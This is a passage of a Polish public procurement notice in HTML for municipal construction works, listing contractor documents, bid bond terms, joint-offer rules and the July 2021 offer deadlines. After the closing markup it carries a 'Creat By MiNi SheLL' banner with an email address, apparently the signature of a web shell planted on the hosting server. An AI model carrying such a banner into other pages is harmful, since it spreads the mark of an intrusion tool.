te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>2)	wykaz osób odpowiedzialnych za kierowanie robotami w specjalności drogowej, instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego oraz podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia wraz z oświadczeniami, o którym mowa w Rozdziale XI<br/>ust. 1, także oświadczenia podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w<br/>jakim Wykonawca powołuje się na jego zasoby, tj.:<br/>1) Oświadczenie Podmiotu udostępniającego zasoby o spełnianiu warunków udziału w<br/>postępowaniu – składane na podstawie art. 125 ust. 5 ustawy Pzp – Załącznik nr 1a.<br/>2) Oświadczenie Podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu – składane<br/>na podstawie art. 125 ust. 5 ustawy Pzp – Załącznik nr 2a.<br/>Oświadczenia składa się pod rygorem nieważności w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. 2. Inne dokumenty<br/>dołączane do Formularza oferty:<br/>1) Pełnomocnictwo osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie<br/>wynika bezpośrednio z załączonych dokumentów.<br/>2) W przypadku złożenia oferty wspólnej – pełnomocnictwo udzielone liderowi.<br/>3) Zobowiązanie podmiotu udostępniającego zasoby – Załącznik Nr 3 lub inny podmiotowy<br/>środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów. /jeżeli dotyczy/<br/>4) Oświadczenie z art. 117 ust. 4 Pzp - Wykonawcy wspólnie ubiegającego się o udzielenie<br/>zamówienia – Załącznik Nr 4./jeżeli dotyczy/ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Oferta musi być zabezpieczona wadium w wysokości: 10 000,00 złotych.<br/>[Szczegółowo informacje dotyczące wadium- ze względu na ograniczoną ilość znaków- zostały<br/>określone w Rozdziale XIII SWZ] <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Oferta wspólna:<br/>1) W przypadku złożenia oferty wspólnej Wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Oferta wspólna musi spełniać wymagania:<br/>a) oświadczenie, o którym mowa w Rozdziale XI ust. 1 pkt 1 SWZ składa:<br/>- każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu lub<br/>- pełnomocnik (umocowany do składania oświadczeń) w imieniu każdego z Wykonawców<br/>osobno.<br/>b) oświadczenie, o którym mowa w Rozdziale XI ust. 1 pkt 2 SWZ składa:<br/>- każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(na oddzielnym formularzu) lub<br/>- pełnomocnik (umocowany do składania oświadczeń) w imieniu każdego z Wykonawców osobno.<br/>2. Jeśli Wykonawcy wspólnie ubiegają się o udzielenie niniejszego zamówienia to warunek<br/>określony w Rozdziale IX ust. 1 pkt 4 lit. a SWZ musi spełniać każdy z Wykonawców, natomiast<br/>każdy warunek określony w Rozdziale IX ust. 1 pkt 4 lit. b i c SWZ musi spełniać co najmniej<br/>jeden z Wykonawców składających ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przewidywane zmiany umowy zostały szczegółowo określone w § 11 Projektu umowy stanowiącego załącznik nr 6 do SWZ (Ze względu na ograniczoną ilość wprowadzenia znaków<br/>w ogłoszeniu o zamówieniu) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-20 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://umsierpc.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-20 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-18</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-30 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com